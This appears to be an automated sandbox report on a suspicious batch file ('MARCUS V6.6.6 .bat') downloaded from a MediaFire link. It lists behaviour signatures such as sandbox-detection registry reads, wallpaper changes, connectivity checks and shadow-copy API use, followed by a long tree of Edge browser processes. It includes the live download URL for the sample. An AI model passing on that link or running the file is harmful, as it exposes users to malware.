Analysis

max time kernel: 289s
max time network: 291s
platform: windows10-ltsc_2021_x64
resource: win10ltsc2021-20250410-en
resource tags: arch:x64, arch:x86, image:win10ltsc2021-20250410-en, locale:en-us, os:windows10-ltsc_2021-x64, system
submitted: 02/05/2025, 10:53

Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
  Sample: https://www.mediafire.com/file/x2gpxs8tk4fud03/MARCUS+V6.6.6+.bat/file
  Resource: win10v2004-20250314-en
Behavioral task: behavioral2
  Sample: https://www.mediafire.com/file/x2gpxs8tk4fud03/MARCUS+V6.6.6+.bat/file
  Resource: win10ltsc2021-20250410-en
Behavioral task: behavioral3
  Sample: https://www.mediafire.com/file/x2gpxs8tk4fud03/MARCUS+V6.6.6+.bat/file
  Resource: win11-20250410-en

Errors

General

Target: https://www.mediafire.com/file/x2gpxs8tk4fud03/MARCUS+V6.6.6+.bat/file

Malware Config

Signatures
Sets desktop wallpaper using registry (2 TTPs, 3 IoCs)
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-137520623-1834890667-2396102459-1000\Control Panel\Desktop\Wallpaper = "C:\\magnus\\matrix.bmp" | reg.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-137520623-1834890667-2396102459-1000\Control Panel\Desktop\Wallpaper = "C:\\magnus\\matrix.bmp" | reg.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-137520623-1834890667-2396102459-1000\Control Panel\Desktop\Wallpaper = "C:\\magnus\\matrix.bmp" | reg.exe
Drops file in Windows directory (64 IoCs)
System Network Configuration Discovery: Internet Connection Discovery (1 TTPs, 3 IoCs)
Adversaries may check for Internet connectivity on compromised systems.
pid | Process
4276 | powershell.exe
712 | powershell.exe
784 | powershell.exe
Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | taskmgr.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | taskmgr.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | taskmgr.exe
Checks processor information in registry (2 TTPs, 4 IoCs)
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | msedge.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | msedge.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | msedge.exe
Enumerates system info in registry (2 TTPs, 6 IoCs)
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Modifies data under HKEY_USERS (18 IoCs)
Modifies registry class (3 IoCs)
description | ioc | Process
Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-137520623-1834890667-2396102459-1000\{B1A8B0B8-C3C8-4A70-96CE-EC95FC4F6072} | msedge.exe
Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-137520623-1834890667-2396102459-1000\{C7599DDF-BF70-46A0-B2B5-4DEBAD9AA986} | msedge.exe
Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-137520623-1834890667-2396102459-1000\{4E199AB1-8965-4032-9156-73C01C0E33B3} | msedge.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (16 IoCs)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
Suspicious use of FindShellTrayWindow (37 IoCs)
Suspicious use of SendNotifyMessage (19 IoCs)
Suspicious use of SetWindowsHookEx (1 IoCs)
pid | Process
2624 | LogonUI.exe
Suspicious use of WriteProcessMemory (64 IoCs)
Uses Task Scheduler COM API (1 TTPs)
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3892)
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.mediafire.com/file/x2gpxs8tk4fud03/MARCUS+V6.6.6+.bat/file
  - Drops file in Windows directory
  - Checks processor information in registry
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Modifies registry class
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 240)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2f0,0x2f4,0x2f8,0x2ec,0x31c,0x7ffdbf0cf208,0x7ffdbf0cf214,0x7ffdbf0cf220

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5832)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2056,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=2052 /prefetch:2

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2368)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1936,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=2152 /prefetch:3

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3968)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2552,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=2576 /prefetch:8

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5852)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3440,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=3492 /prefetch:1

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2604)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3472,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=3508 /prefetch:1

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4584)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=5592,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=5540 /prefetch:1

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 524)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=3464,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=3636 /prefetch:1

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 2464)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5496,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=5396 /prefetch:8

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 5868)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5212,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=5388 /prefetch:8

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4624)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6020,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=5852 /prefetch:8

  C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe (PID 4744)
    "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6168,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6200 /prefetch:8

  C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe (PID 560)
    "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6168,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6200 /prefetch:8

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3984)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6376,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6400 /prefetch:8

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 6116)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3548,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6372 /prefetch:8

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4496)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6240,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=5488 /prefetch:8

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4504)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6268,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6568 /prefetch:8

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 4564)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4272,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6572 /prefetch:8

  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe (PID 3980)
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5680,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=3640 /prefetch:8
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6152,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=5788 /prefetch:82⤵PID:4008
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=1268,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6616 /prefetch:82⤵PID:5220
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=6640,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6512 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3548
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6512,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=896 /prefetch:82⤵PID:2860
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4808,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=3200 /prefetch:82⤵PID:3940
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4936,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=3200 /prefetch:82⤵PID:1524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4952,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6612 /prefetch:82⤵PID:5116
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=896,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6080 /prefetch:12⤵PID:2600
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --always-read-main-dll --field-trial-handle=6380,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6796 /prefetch:12⤵PID:2000
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --always-read-main-dll --field-trial-handle=6932,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6432 /prefetch:12⤵PID:5532
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6388,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7104 /prefetch:82⤵PID:2624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --always-read-main-dll --field-trial-handle=7096,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7140 /prefetch:12⤵PID:5112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7360,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6952 /prefetch:82⤵PID:5508
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --always-read-main-dll --field-trial-handle=6448,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7508 /prefetch:12⤵PID:3972
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --always-read-main-dll --field-trial-handle=7688,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6464 /prefetch:12⤵PID:2836
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --always-read-main-dll --field-trial-handle=7680,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7828 /prefetch:12⤵PID:3224
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=7944,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7972 /prefetch:12⤵PID:4820
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --always-read-main-dll --field-trial-handle=6948,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7376 /prefetch:12⤵PID:1780
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --always-read-main-dll --field-trial-handle=8284,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7092 /prefetch:12⤵PID:5052
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6404,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7624 /prefetch:82⤵
- Modifies registry class
PID:2488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8108,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7644 /prefetch:82⤵PID:2524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --always-read-main-dll --field-trial-handle=6428,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=6584 /prefetch:12⤵PID:3996
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6648,i,3143511841322226284,17712345277929289710,262144 --variations-seed-version --mojo-platform-channel-handle=7272 /prefetch:82⤵PID:5428
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window2⤵
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
PID:2760 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x264,0x268,0x26c,0x260,0x274,0x7ffdbf0cf208,0x7ffdbf0cf214,0x7ffdbf0cf2203⤵PID:3524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1812,i,6946532384449729555,16583352416098345170,262144 --variations-seed-version --mojo-platform-channel-handle=2216 /prefetch:33⤵PID:5952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2184,i,6946532384449729555,16583352416098345170,262144 --variations-seed-version --mojo-platform-channel-handle=2156 /prefetch:23⤵PID:1076
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2520,i,6946532384449729555,16583352416098345170,262144 --variations-seed-version --mojo-platform-channel-handle=2840 /prefetch:83⤵PID:10552
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4272,i,6946532384449729555,16583352416098345170,262144 --variations-seed-version --mojo-platform-channel-handle=4192 /prefetch:83⤵PID:1052
-
-
